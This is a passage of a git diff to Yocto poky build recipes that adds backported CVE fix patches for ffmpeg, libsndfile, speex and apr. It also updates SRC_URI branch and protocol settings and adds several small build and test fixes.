int frame_bytes) + { +- return get_audio_frame_duration(par->codec_id, par->sample_rate, ++ int duration = get_audio_frame_duration(par->codec_id, par->sample_rate, + par->channels, par->block_align, + par->codec_tag, par->bits_per_coded_sample, + par->bit_rate, par->extradata, par->frame_size, + frame_bytes); ++ return FFMAX(0, duration); + } + + #if !HAVE_THREADS +-- +2.20.1 diff --git a/poky/meta/recipes-multimedia/ffmpeg/ffmpeg_4.2.2.bb b/poky/meta/recipes-multimedia/ffmpeg/ffmpeg_4.2.2.bb index 0e359848fa..1d6f2e528b 100644 --- a/poky/meta/recipes-multimedia/ffmpeg/ffmpeg_4.2.2.bb +++ b/poky/meta/recipes-multimedia/ffmpeg/ffmpeg_4.2.2.bb @@ -27,7 +27,9 @@ SRC_URI = "https://www.ffmpeg.org/releases/${BP}.tar.xz \ file://mips64_cpu_detection.patch \ file://CVE-2020-12284.patch \ file://0001-libavutil-include-assembly-with-full-path-from-sourc.patch \ - " + file://CVE-2021-3566.patch \ + file://CVE-2021-38291.patch \ + " SRC_URI[md5sum] = "348956fc2faa57a2f79bbb84ded9fbc3" SRC_URI[sha256sum] = "cb754255ab0ee2ea5f66f8850e1bd6ad5cac1cd855d0a2f4990fb8c668b0d29c" diff --git a/poky/meta/recipes-multimedia/gstreamer/gst-examples_1.16.0.bb b/poky/meta/recipes-multimedia/gstreamer/gst-examples_1.16.0.bb index af79a6f952..6494013e3f 100644 --- a/poky/meta/recipes-multimedia/gstreamer/gst-examples_1.16.0.bb +++ b/poky/meta/recipes-multimedia/gstreamer/gst-examples_1.16.0.bb @@ -7,7 +7,7 @@ LIC_FILES_CHKSUM = "file://playback/player/gtk/gtk-play.c;beginline=1;endline=20 DEPENDS = "glib-2.0 gstreamer1.0 gstreamer1.0-plugins-base gstreamer1.0-plugins-bad gtk+3 glib-2.0-native" -SRC_URI = "git://gitlab.freedesktop.org/gstreamer/gst-examples.git;protocol=https \ +SRC_URI = "git://gitlab.freedesktop.org/gstreamer/gst-examples.git;protocol=https;branch=master \ file://0001-Make-player-examples-installable.patch \ file://gst-player.desktop \ " diff --git a/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0/0006-tests-seek-Don-t-use-too-strict-timeout-for-validati.patch b/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0/0006-tests-seek-Don-t-use-too-strict-timeout-for-validati.patch new file mode 100644 index 0000000000..e32f3c101f --- /dev/null +++ b/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0/0006-tests-seek-Don-t-use-too-strict-timeout-for-validati.patch @@ -0,0 +1,33 @@ +From 1db36347d05d88835519368442e9aa89c64091ad Mon Sep 17 00:00:00 2001 +From: Seungha Yang +Date: Tue, 15 Sep 2020 00:54:58 +0900 +Subject: [PATCH] tests: seek: Don't use too strict timeout for validation + +Expected segment-done message might not be seen within expected +time if system is not powerful enough. + +Part-of: + +Upstream-Status: Backport [https://cgit.freedesktop.org/gstreamer/gstreamer/commit?id=f44312ae5d831438fcf8041162079c65321c588c] +Signed-off-by: Anuj Mittal +Signed-off-by: Jose Quaresma +--- + tests/check/pipelines/seek.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/tests/check/pipelines/seek.c b/tests/check/pipelines/seek.c +index 28bb8846d..5f7447bc5 100644 +--- a/tests/check/pipelines/seek.c ++++ b/tests/check/pipelines/seek.c +@@ -521,7 +521,7 @@ GST_START_TEST (test_loopback_2) + + GST_INFO ("wait for segment done message"); + +- msg = gst_bus_timed_pop_filtered (bus, (GstClockTime) 2 * GST_SECOND, ++ msg = gst_bus_timed_pop_filtered (bus, GST_CLOCK_TIME_NONE, + GST_MESSAGE_SEGMENT_DONE | GST_MESSAGE_ERROR); + fail_unless (msg, "no message within the timed window"); + fail_unless_equals_string (GST_MESSAGE_TYPE_NAME (msg), "segment-done"); +-- +2.29.2 + diff --git a/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0_1.16.3.bb b/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0_1.16.3.bb index a516fabdaf..236d6034d6 100644 --- a/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0_1.16.3.bb +++ b/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0_1.16.3.bb @@ -22,6 +22,7 @@ SRC_URI = " \ file://0003-meson-Add-valgrind-feature.patch \ file://0004-meson-Add-option-for-installed-tests.patch \ file://0005-bufferpool-only-resize-in-reset-when-maxsize-is-larger.patch \ + file://0006-tests-seek-Don-t-use-too-strict-timeout-for-validati.patch \ " SRC_URI[md5sum] = "beecf6965a17fb17fa3b262fd36df70a" SRC_URI[sha256sum] = "692f037968e454e508b0f71d9674e2e26c78475021407fcf8193b1c7e59543c7" diff --git a/poky/meta/recipes-multimedia/libsamplerate/libsamplerate0/shared_version_info.patch b/poky/meta/recipes-multimedia/libsamplerate/libsamplerate0/shared_version_info.patch new file mode 100644 index 0000000000..b42d564b4b --- /dev/null +++ b/poky/meta/recipes-multimedia/libsamplerate/libsamplerate0/shared_version_info.patch @@ -0,0 +1,13 @@ +Index: libsamplerate-0.1.8/configure.ac +=================================================================== +--- libsamplerate-0.1.8.orig/configure.ac ++++ libsamplerate-0.1.8/configure.ac +@@ -53,7 +53,7 @@ AC_PROG_LN_S + # 6. If any interfaces have been removed since the last public release, then set age + # to 0. + +-SHARED_VERSION_INFO="1:8:1" ++SHARED_VERSION_INFO="1:9:1" + + + diff --git a/poky/meta/recipes-multimedia/libsamplerate/libsamplerate0_0.1.9.bb b/poky/meta/recipes-multimedia/libsamplerate/libsamplerate0_0.1.9.bb index 6dfc42b436..8345d6880f 100644 --- a/poky/meta/recipes-multimedia/libsamplerate/libsamplerate0_0.1.9.bb +++ b/poky/meta/recipes-multimedia/libsamplerate/libsamplerate0_0.1.9.bb @@ -10,6 +10,7 @@ PR = "r1" SRC_URI = "http://www.mega-nerd.com/SRC/libsamplerate-${PV}.tar.gz \ file://0001-configure.ac-improve-alsa-handling.patch \ + file://shared_version_info.patch \ " SRC_URI[md5sum] = "2b78ae9fe63b36b9fbb6267fad93f259" diff --git a/poky/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_1.patch b/poky/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_1.patch new file mode 100644 index 0000000000..6354f856cb --- /dev/null +++ b/poky/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_1.patch @@ -0,0 +1,36 @@ +From a9815b3f228df00086e0a40bcc43162fc19896a1 Mon Sep 17 00:00:00 2001 +From: bobsayshilol +Date: Wed, 17 Feb 2021 23:21:48 +0000 +Subject: [PATCH 1/2] wavlike: Fix incorrect size check + +The SF_CART_INFO_16K struct has an additional 4 byte field to hold +the size of 'tag_text' which the file header doesn't, so don't +include it as part of the check when looking for the max length. + +https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=26026 + +Upstream-Status: Backport +CVE: CVE-2021-3246 patch 1 +Signed-off-by: Armin Kuster + +--- + src/wavlike.c | 6 +++++- + 1 file changed, 5 insertions(+), 1 deletion(-) + +Index: libsndfile-1.0.28/src/wavlike.c +=================================================================== +--- libsndfile-1.0.28.orig/src/wavlike.c ++++ libsndfile-1.0.28/src/wavlike.c +@@ -803,7 +803,11 @@ wavlike_read_cart_chunk (SF_PRIVATE *psf + return 0 ; + } ; + +- if (chunksize >= sizeof (SF_CART_INFO_16K)) ++ /* ++ ** SF_CART_INFO_16K has an extra field 'tag_text_size' that isn't part ++ ** of the chunk, so don't include it in the size check. ++ */ ++ if (chunksize >= sizeof (SF_CART_INFO_16K) - 4) + { psf_log_printf (psf, "cart : %u too big to be handled\n", chunksize) ; + psf_binheader_readf (psf, "j", chunksize) ; + return 0 ; diff --git a/poky/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_2.patch b/poky/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_2.patch new file mode 100644 index 0000000000..d6b03d7d4d --- /dev/null +++ b/poky/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_2.patch @@ -0,0 +1,44 @@ +From deb669ee8be55a94565f6f8a6b60890c2e7c6f32 Mon Sep 17 00:00:00 2001 +From: bobsayshilol +Date: Thu, 18 Feb 2021 21:52:09 +0000 +Subject: [PATCH 2/2] ms_adpcm: Fix and extend size checks + +'blockalign' is the size of a block, and each block contains 7 samples +per channel as part of the preamble, so check against 'samplesperblock' +rather than 'blockalign'. Also add an additional check that the block +is big enough to hold the samples it claims to hold. + +https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=26803 + +Upstream-Status: Backport +CVE: CVE-2021-3246 patch 2 +Signed-off-by: Armin Kuster + +--- + src/ms_adpcm.c | 10 ++++++++-- + 1 file changed, 8 insertions(+), 2 deletions(-) + +diff --git a/src/ms_adpcm.c b/src/ms_adpcm.c +index 5e8f1a31..a21cb994 100644 +--- a/src/ms_adpcm.c ++++ b/src/ms_adpcm.c +@@ -128,8 +128,14 @@ wavlike_msadpcm_init (SF_PRIVATE *psf, int blockalign, int samplesperblock) + if (psf->file.mode == SFM_WRITE) + samplesperblock = 2 + 2 * (blockalign - 7 * psf->sf.channels) / psf->sf.channels ; + +- if (blockalign < 7 * psf->sf.channels) +- { psf_log_printf (psf, "*** Error blockalign (%d) should be > %d.\n", blockalign, 7 * psf->sf.channels) ; ++ /* There's 7 samples per channel in the preamble of each block */ ++ if (samplesperblock < 7 * psf->sf.channels) ++ { psf_log_printf (psf, "*** Error samplesperblock (%d) should be >= %d.\n", samplesperblock, 7 * psf->sf.channels) ; ++ return SFE_INTERNAL ; ++ } ; ++ ++ if (2 * blockalign < samplesperblock * psf->sf.channels) ++ { psf_log_printf (psf, "*** Error blockalign (%d) should be >= %d.\n", blockalign, samplesperblock * psf->sf.channels / 2) ; + return SFE_INTERNAL ; + } ; + +-- +2.25.1 + diff --git a/poky/meta/recipes-multimedia/libsndfile/libsndfile1_1.0.28.bb b/poky/meta/recipes-multimedia/libsndfile/libsndfile1_1.0.28.bb index 044881a859..2525af8fe0 100644 --- a/poky/meta/recipes-multimedia/libsndfile/libsndfile1_1.0.28.bb +++ b/poky/meta/recipes-multimedia/libsndfile/libsndfile1_1.0.28.bb @@ -20,6 +20,8 @@ SRC_URI = "http://www.mega-nerd.com/libsndfile/files/libsndfile-${PV}.tar.gz \ file://CVE-2017-12562.patch \ file://CVE-2018-19758.patch \ file://CVE-2019-3832.patch \ + file://CVE-2021-3246_1.patch \ + file://CVE-2021-3246_2.patch \ " SRC_URI[md5sum] = "646b5f98ce89ac60cdb060fcd398247c" diff --git a/poky/meta/recipes-multimedia/speex/speex/CVE-2020-23903.patch b/poky/meta/recipes-multimedia/speex/speex/CVE-2020-23903.patch new file mode 100644 index 0000000000..eb16e95ffc --- /dev/null +++ b/poky/meta/recipes-multimedia/speex/speex/CVE-2020-23903.patch @@ -0,0 +1,30 @@ +Backport patch to fix CVE-2020-23903. + +CVE: CVE-2020-23903 +Upstream-Status: Backport [https://github.com/xiph/speex/commit/870ff84] + +Signed-off-by: Kai Kang + +From 870ff845b32f314aec0036641ffe18aba4916887 Mon Sep 17 00:00:00 2001 +From: Tristan Matthews +Date: Mon, 13 Jul 2020 23:25:03 -0400 +Subject: [PATCH] wav_io: guard against invalid channel numbers + +Fixes #13 +--- + src/wav_io.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/src/wav_io.c b/src/wav_io.c +index b5183015..09d62eb0 100644 +--- a/src/wav_io.c ++++ b/src/wav_io.c +@@ -111,7 +111,7 @@ int read_wav_header(FILE *file, int *rate, int *channels, int *format, spx_int32 + stmp = le_short(stmp); + *channels = stmp; + +- if (stmp>2) ++ if (stmp>2 || stmp<1) + { + fprintf (stderr, "Only mono and (intensity) stereo supported\n"); + return -1; diff --git a/poky/meta/recipes-multimedia/speex/speex_1.2.0.bb b/poky/meta/recipes-multimedia/speex/speex_1.2.0.bb index 3a0911d6f8..ea475f0f1b 100644 --- a/poky/meta/recipes-multimedia/speex/speex_1.2.0.bb +++ b/poky/meta/recipes-multimedia/speex/speex_1.2.0.bb @@ -7,7 +7,9 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=314649d8ba9dd7045dfb6683f298d0a8 \ file://include/speex/speex.h;beginline=1;endline=34;md5=ef8c8ea4f7198d71cf3509c6ed05ea50" DEPENDS = "libogg speexdsp" -SRC_URI = "http://downloads.xiph.org/releases/speex/speex-${PV}.tar.gz" +SRC_URI = "http://downloads.xiph.org/releases/speex/speex-${PV}.tar.gz \ + file://CVE-2020-23903.patch \ + " UPSTREAM_CHECK_REGEX = "speex-(?P\d+(\.\d+)+)\.tar" SRC_URI[md5sum] = "8ab7bb2589110dfaf0ed7fa7757dc49c" diff --git a/poky/meta/recipes-multimedia/x264/x264_git.bb b/poky/meta/recipes-multimedia/x264/x264_git.bb index 39429a8809..6789646833 100644 --- a/poky/meta/recipes-multimedia/x264/x264_git.bb +++ b/poky/meta/recipes-multimedia/x264/x264_git.bb @@ -8,7 +8,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=94d55d512a9ba36caa9b7df079bae19f" DEPENDS = "nasm-native" -SRC_URI = "git://github.com/mirror/x264;branch=stable \ +SRC_URI = "git://github.com/mirror/x264;branch=stable;protocol=https \ file://don-t-default-to-cortex-a9-with-neon.patch \ file://Fix-X32-build-by-disabling-asm.patch \ " diff --git a/poky/meta/recipes-rt/rt-tests/rt-tests.inc b/poky/meta/recipes-rt/rt-tests/rt-tests.inc index 3ac39d90c3..29ebe2d361 100644 --- a/poky/meta/recipes-rt/rt-tests/rt-tests.inc +++ b/poky/meta/recipes-rt/rt-tests/rt-tests.inc @@ -2,7 +2,7 @@ SRCREV = "dff174f994f547a5785d32454865f140daacb0f5" PE = "1" -SRC_URI = "git://git.kernel.org/pub/scm/utils/rt-tests/rt-tests.git" +SRC_URI = "git://git.kernel.org/pub/scm/utils/rt-tests/rt-tests.git;branch=main" # 1.2 to 1.5 seem to be development versions UPSTREAM_CHECK_GITTAGREGEX = "v(?P(?!1\.[2-6])(\d+(\.\d+)+))" diff --git a/poky/meta/recipes-sato/images/core-image-sato.bb b/poky/meta/recipes-sato/images/core-image-sato.bb index e50b24a476..300d8e0d43 100644 --- a/poky/meta/recipes-sato/images/core-image-sato.bb +++ b/poky/meta/recipes-sato/images/core-image-sato.bb @@ -13,4 +13,5 @@ TOOLCHAIN_HOST_TASK_append = " nativesdk-intltool nativesdk-glib-2.0" TOOLCHAIN_HOST_TASK_remove_task-populate-sdk-ext = " nativesdk-intltool nativesdk-glib-2.0" QB_MEM = '${@bb.utils.contains("DISTRO_FEATURES", "opengl", "-m 512", "-m 256", d)}' +QB_MEM_qemuarmv5 = "-m 256" QB_MEM_qemumips = "-m 256" diff --git a/poky/meta/recipes-sato/l3afpad/l3afpad_git.bb b/poky/meta/recipes-sato/l3afpad/l3afpad_git.bb index 85c2c500ea..4d5d299d47 100644 --- a/poky/meta/recipes-sato/l3afpad/l3afpad_git.bb +++ b/poky/meta/recipes-sato/l3afpad/l3afpad_git.bb @@ -16,7 +16,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c \ DEPENDS = "gtk+3 intltool-native gettext-native" PV = "0.8.18.1.11+git${SRCPV}" -SRC_URI = "git://github.com/stevenhoneyman/l3afpad.git" +SRC_URI = "git://github.com/stevenhoneyman/l3afpad.git;branch=master;protocol=https" SRCREV ="3cdccdc9505643e50f8208171d9eee5de11a42ff" S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-sato/matchbox-config-gtk/matchbox-config-gtk_0.2.bb b/poky/meta/recipes-sato/matchbox-config-gtk/matchbox-config-gtk_0.2.bb index 547e851c15..5733a36b12 100644 --- a/poky/meta/recipes-sato/matchbox-config-gtk/matchbox-config-gtk_0.2.bb +++ b/poky/meta/recipes-sato/matchbox-config-gtk/matchbox-config-gtk_0.2.bb @@ -11,7 +11,7 @@ RDEPENDS_${PN} = "settings-daemon" # SRCREV tagged 0.2 SRCREV = "ef2192ce98d9374ffdad5f78544c3f8f353c16aa" -SRC_URI = "git://git.yoctoproject.org/${BPN} \ +SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master \ file://no-handed.patch" UPSTREAM_CHECK_GITTAGREGEX = "(?P(\d+(\.\d+)+))" diff --git a/poky/meta/recipes-sato/matchbox-desktop/matchbox-desktop_2.2.bb b/poky/meta/recipes-sato/matchbox-desktop/matchbox-desktop_2.2.bb index cc51f47b63..2a2eb24f57 100644 --- a/poky/meta/recipes-sato/matchbox-desktop/matchbox-desktop_2.2.bb +++ b/poky/meta/recipes-sato/matchbox-desktop/matchbox-desktop_2.2.bb @@ -13,7 +13,7 @@ SECTION = "x11/wm" # SRCREV tagged 2.2 SRCREV = "6bc67d09da4147e5552fe30011a05a2c59d2f777" -SRC_URI = "git://git.yoctoproject.org/${BPN}-2 \ +SRC_URI = "git://git.yoctoproject.org/${BPN}-2;branch=master \ file://vfolders/* \ " diff --git a/poky/meta/recipes-sato/matchbox-panel-2/matchbox-panel-2_2.11.bb b/poky/meta/recipes-sato/matchbox-panel-2/matchbox-panel-2_2.11.bb index c659964a2b..54fe578cd3 100644 --- a/poky/meta/recipes-sato/matchbox-panel-2/matchbox-panel-2_2.11.bb +++ b/poky/meta/recipes-sato/matchbox-panel-2/matchbox-panel-2_2.11.bb @@ -23,7 +23,7 @@ RPROVIDES_${PN} = "matchbox-panel" RREPLACES_${PN} = "matchbox-panel" RCONFLICTS_${PN} = "matchbox-panel" -SRC_URI = "git://git.yoctoproject.org/${BPN} \ +SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master \ file://0001-applets-systray-Allow-icons-to-be-smaller.patch \ " diff --git a/poky/meta/recipes-sato/matchbox-terminal/matchbox-terminal_0.2.bb b/poky/meta/recipes-sato/matchbox-terminal/matchbox-terminal_0.2.bb index 9f00281dde..e2e81c2905 100644 --- a/poky/meta/recipes-sato/matchbox-terminal/matchbox-terminal_0.2.bb +++ b/poky/meta/recipes-sato/matchbox-terminal/matchbox-terminal_0.2.bb @@ -11,7 +11,7 @@ SECTION = "x11/utils" #SRCREV tagged 0.2 SRCREV = "161276d0f5d1be8187010fd0d9581a6feca70ea5" -SRC_URI = "git://git.yoctoproject.org/${BPN}" +SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master" UPSTREAM_CHECK_GITTAGREGEX = "(?P(\d+(\.\d+)+))" S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-sato/matchbox-theme-sato/matchbox-theme-sato_0.2.bb b/poky/meta/recipes-sato/matchbox-theme-sato/matchbox-theme-sato_0.2.bb index 7a043d3447..bc4024736f 100644 --- a/poky/meta/recipes-sato/matchbox-theme-sato/matchbox-theme-sato_0.2.bb +++ b/poky/meta/recipes-sato/matchbox-theme-sato/matchbox-theme-sato_0.2.bb @@ -2,7 +2,7 @@ require matchbox-theme-sato.inc # SRCREV tagged 0.2 SRCREV = "df085ba9cdaeaf2956890b0e29d7ea1779bf6c78" -SRC_URI = "git://git.yoctoproject.org/matchbox-sato" +SRC_URI = "git://git.yoctoproject.org/matchbox-sato;branch=master" UPSTREAM_CHECK_GITTAGREGEX = "(?P(\d+(\.\d+)+))" S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-sato/puzzles/puzzles_git.bb b/poky/meta/recipes-sato/puzzles/puzzles_git.bb index befe4a53f4..2edc9ada2e 100644 --- a/poky/meta/recipes-sato/puzzles/puzzles_git.bb +++ b/poky/meta/recipes-sato/puzzles/puzzles_git.bb @@ -9,7 +9,7 @@ DEPENDS = "libxt" # The libxt requires x11 in DISTRO_FEATURES REQUIRED_DISTRO_FEATURES = "x11" -SRC_URI = "git://git.tartarus.org/simon/puzzles.git \ +SRC_URI = "git://git.tartarus.org/simon/puzzles.git;branch=master \ file://fix-compiling-failure-with-option-g-O.patch \ file://0001-palisade-Fix-warnings-with-clang-on-arm.patch \ file://0001-Use-Wno-error-format-overflow-if-the-compiler-suppor.patch \ diff --git a/poky/meta/recipes-sato/sato-screenshot/sato-screenshot_0.3.bb b/poky/meta/recipes-sato/sato-screenshot/sato-screenshot_0.3.bb index 2b1f513f1c..7e7612253d 100644 --- a/poky/meta/recipes-sato/sato-screenshot/sato-screenshot_0.3.bb +++ b/poky/meta/recipes-sato/sato-screenshot/sato-screenshot_0.3.bb @@ -11,7 +11,7 @@ DEPENDS = "matchbox-panel-2 gtk+3" # SRCREV tagged 0.3 SRCREV = "9250fa5a012d84ff45984e8c4345ee7635227756" -SRC_URI = "git://git.yoctoproject.org/screenshot" +SRC_URI = "git://git.yoctoproject.org/screenshot;branch=master" UPSTREAM_CHECK_GITTAGREGEX = "(?P(\d+(\.\d+)+))" S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-sato/settings-daemon/settings-daemon_0.0.2.bb b/poky/meta/recipes-sato/settings-daemon/settings-daemon_0.0.2.bb index d01177f9b9..19c4a73dc3 100644 --- a/poky/meta/recipes-sato/settings-daemon/settings-daemon_0.0.2.bb +++ b/poky/meta/recipes-sato/settings-daemon/settings-daemon_0.0.2.bb @@ -9,7 +9,7 @@ SECTION = "x11" # SRCREV tagged 0.0.2 SRCREV = "b2e5da502f8c5ff75e9e6da771372ef8e40fd9a2" -SRC_URI = "git://git.yoctoproject.org/xsettings-daemon \ +SRC_URI = "git://git.yoctoproject.org/xsettings-daemon;branch=master \ file://addsoundkeys.patch \ file://70settings-daemon.sh \ " diff --git a/poky/meta/recipes-sato/webkit/webkitgtk/0001-MiniBrowser-Fix-reproduciblity.patch b/poky/meta/recipes-sato/webkit/webkitgtk/0001-MiniBrowser-Fix-reproduciblity.patch new file mode 100644 index 0000000000..528dec8c8b --- /dev/null +++ b/poky/meta/recipes-sato/webkit/webkitgtk/0001-MiniBrowser-Fix-reproduciblity.patch @@ -0,0 +1,31 @@ +From dcf9ae0dc0b4510eddbeeea09e11edfb123f95af Mon Sep 17 00:00:00 2001 +From: Khem Raj +Date: Sun, 2 May 2021 13:10:49 -0700 +Subject: [PATCH] MiniBrowser: Fix reproduciblity + +Do not emit references to source dir in generated sourcecode + +Upstream-Status: Submitted [https://bugs.webkit.org/show_bug.cgi?id=225283] +Signed-off-by: Khem Raj +--- + Tools/MiniBrowser/gtk/CMakeLists.txt | 4 ++-- + 1 file changed, 2 insertions(+), 2 deletions(-) + +diff --git a/Tools/MiniBrowser/gtk/CMakeLists.txt b/Tools/MiniBrowser/gtk/CMakeLists.txt +index 93b62521..482d3b00 100644 +--- a/Tools/MiniBrowser/gtk/CMakeLists.txt ++++ b/Tools/MiniBrowser/gtk/CMakeLists.txt +@@ -48,8 +48,8 @@ add_custom_command( + OUTPUT ${DERIVED_SOURCES_MINIBROWSER_DIR}/BrowserMarshal.c + ${DERIVED_SOURCES_MINIBROWSER_DIR}/BrowserMarshal.h + MAIN_DEPENDENCY ${MINIBROWSER_DIR}/browser-marshal.list +- COMMAND glib-genmarshal --prefix=browser_marshal ${MINIBROWSER_DIR}/browser-marshal.list --body > ${DERIVED_SOURCES_MINIBROWSER_DIR}/BrowserMarshal.c +- COMMAND glib-genmarshal --prefix=browser_marshal ${MINIBROWSER_DIR}/browser-marshal.list --header > ${DERIVED_SOURCES_MINIBROWSER_DIR}/BrowserMarshal.h ++ COMMAND glib-genmarshal --prefix=browser_marshal ${MINIBROWSER_DIR}/browser-marshal.list --body --skip-source > ${DERIVED_SOURCES_MINIBROWSER_DIR}/BrowserMarshal.c ++ COMMAND glib-genmarshal --prefix=browser_marshal ${MINIBROWSER_DIR}/browser-marshal.list --header --skip-source > ${DERIVED_SOURCES_MINIBROWSER_DIR}/BrowserMarshal.h + VERBATIM) + + if (DEVELOPER_MODE) +-- +2.31.1 + diff --git a/poky/meta/recipes-sato/webkit/webkitgtk_2.28.4.bb b/poky/meta/recipes-sato/webkit/webkitgtk_2.28.4.bb index ceda2992d7..2e3f0aa682 100644 --- a/poky/meta/recipes-sato/webkit/webkitgtk_2.28.4.bb +++ b/poky/meta/recipes-sato/webkit/webkitgtk_2.28.4.bb @@ -20,6 +20,7 @@ SRC_URI = "https://www.webkitgtk.org/releases/${BPN}-${PV}.tar.xz \ file://0001-Fix-build-with-musl.patch \ file://include_array.patch \ file://0001-clang-11-fix-build-errors-due-to-WWc-11-narrowing.patch \ + file://0001-MiniBrowser-Fix-reproduciblity.patch \ " SRC_URI[sha256sum] = "821952e8c9303ed752f1fb1d4283f612c25249d00d705d2b79c2db1bc49c9464" diff --git a/poky/meta/recipes-support/apr/apr/CVE-2021-35940.patch b/poky/meta/recipes-support/apr/apr/CVE-2021-35940.patch new file mode 100644 index 0000000000..00befdacee --- /dev/null +++ b/poky/meta/recipes-support/apr/apr/CVE-2021-35940.patch @@ -0,0 +1,58 @@ + +SECURITY: CVE-2021-35940 (cve.mitre.org) + +Restore fix for CVE-2017-12613 which was missing in 1.7.x branch, though +was addressed in 1.6.x in 1.6.3 and later via r1807976. + +The fix was merged back to 1.7.x in r1891198. + +Since this was a regression in 1.7.0, a new CVE name has been assigned +to track this, CVE-2021-35940. + +Thanks to Iveta Cesalova for reporting this issue. + +https://svn.apache.org/viewvc?view=revision&revision=1891198 + +Upstream-Status: Backport +CVE: CVE-2021-35940 +Signed-off-by: Armin Kuster + + +Index: time/unix/time.c +=================================================================== +--- a/time/unix/time.c (revision 1891197) ++++ b/time/unix/time.c (revision 1891198) +@@ -142,6 +142,9 @@ + static const int dayoffset[12] = + {306, 337, 0, 31, 61, 92, 122, 153, 184, 214, 245, 275}; + ++ if (xt->tm_mon < 0 || xt->tm_mon >= 12) ++ return APR_EBADDATE; ++ + /* shift new year to 1st March in order to make leap year calc easy */ + + if (xt->tm_mon < 2) +Index: time/win32/time.c +=================================================================== +--- a/time/win32/time.c (revision 1891197) ++++ b/time/win32/time.c (revision 1891198) +@@ -54,6 +54,9 @@ + static const int dayoffset[12] = + {0, 31, 59, 90, 120, 151, 181, 212, 243, 273, 304, 334}; + ++ if (tm->wMonth < 1 || tm->wMonth > 12) ++ return APR_EBADDATE; ++ + /* Note; the caller is responsible for filling in detailed tm_usec, + * tm_gmtoff and tm_isdst data when applicable. + */ +@@ -228,6 +231,9 @@ + static const int dayoffset[12] = + {306, 337, 0, 31, 61, 92, 122, 153, 184, 214, 245, 275}; + ++ if (xt->tm_mon < 0 || xt->tm_mon >= 12) ++ return APR_EBADDATE; ++ + /* shift new year to 1st March in order to make leap year calc easy */ + + if (xt->tm_mon < 2) diff --git a/poky/meta/recipes-support/apr/apr_1.7.0.bb b/poky/meta/recipes-support/apr/apr_1.7.0.bb index 432fa3255c..92cc61a864 100644 --- a/poky/meta/recipes-support/apr/apr_1.7.0.bb +++ b/poky/meta/recipes-support/apr/apr_1.7.0.bb @@ -23,6 +23,7 @@ SRC_URI = "${APACHE_MIRROR}/apr/${BPN}-${PV}.tar.bz2 \ file://0007-explicitly-link-libapr-against-phtread-to-make-gold-.patch \ file://libtoolize_check.patch \ file://0001-Add-option-to-disable-timed-dependant-tests.patch \ + file://CVE-2021-35940.patch \ " SRC_URI[md5sum] = "7a14a83d664e87599ea25ff4432e48a7" diff --git a/poky/meta/recipes-support/bmap-tools/bmap-tools_3.5.bb b/poky/meta/recipes-support/bmap-tools/bmap-tools_3.5.bb index 986f0124e2..97b88ec033 100644 --- a/poky/meta/recipes-support/bmap-tools/bmap-tools_3.5.bb +++ b/poky/meta/recipes-support/bmap-tools/bmap-tools_3.5.bb @@ -9,7 +9,7 @@ SECTION = "console/utils" LICENSE = "GPLv2" LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263" -SRC_URI = "git://github.com/intel/${BPN}" +SRC_URI = "git://github.com/intel/${BPN};branch=master;protocol=https" SRCREV = "db7087b883bf52cbff063ad17a41cc1cbb85104d" S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-support/ca-certificates/ca-certificates/0001-Revert-mozilla-certdata2pem.py-print-a-warning-for-e.patch b/poky/meta/recipes-support/ca-certificates/ca-certificates/0001-Revert-mozilla-certdata2pem.py-print-a-warning-for-e.patch new file mode 100644 index 0000000000..5c4a32f526 --- /dev/null +++ b/poky/meta/recipes-support/ca-certificates/ca-certificates/0001-Revert-mozilla-certdata2pem.py-print-a-warning-for-e.patch @@ -0,0 +1,80 @@ +From cb43ec15b700b25f3c4fe44043a1a021aaf5b768 Mon Sep 17 00:00:00 2001 +From: Alexander Kanavin +Date: Mon, 18 Oct 2021 12:05:49 +0200 +Subject: [PATCH] Revert "mozilla/certdata2pem.py: print a warning for expired + certificates." + +This avoids a dependency on python3-cryptography, and only checks +for expired certs (which is upstream concern, but not ours). + +Upstream-Status: Inappropriate [oe-core specific] +Signed-off-by: Alexander Kanavin +--- + debian/changelog | 1 - + debian/control | 2 +- + mozilla/certdata2pem.py | 11 ----------- + 3 files changed, 1 insertion(+), 13 deletions(-) + +diff --git a/debian/changelog b/debian/changelog +index 531e4d0..4006509 100644 +--- a/debian/changelog ++++ b/debian/changelog +@@ -37,7 +37,6 @@ ca-certificates (20211004) unstable; urgency=low + - "Trustis FPS Root CA" + - "Staat der Nederlanden Root CA - G3" + * Blacklist expired root certificate "DST Root CA X3" (closes: #995432) +- * mozilla/certdata2pem.py: print a warning for expired certificates. + + -- Julien Cristau Thu, 07 Oct 2021 17:12:47 +0200 + +diff --git a/debian/control b/debian/control +index 4434b7a..5c6ba24 100644 +--- a/debian/control ++++ b/debian/control +@@ -3,7 +3,7 @@ Section: misc + Priority: optional + Maintainer: Julien Cristau + Build-Depends: debhelper-compat (= 13), po-debconf +-Build-Depends-Indep: python3, openssl, python3-cryptography ++Build-Depends-Indep: python3, openssl + Standards-Version: 4.5.0.2 + 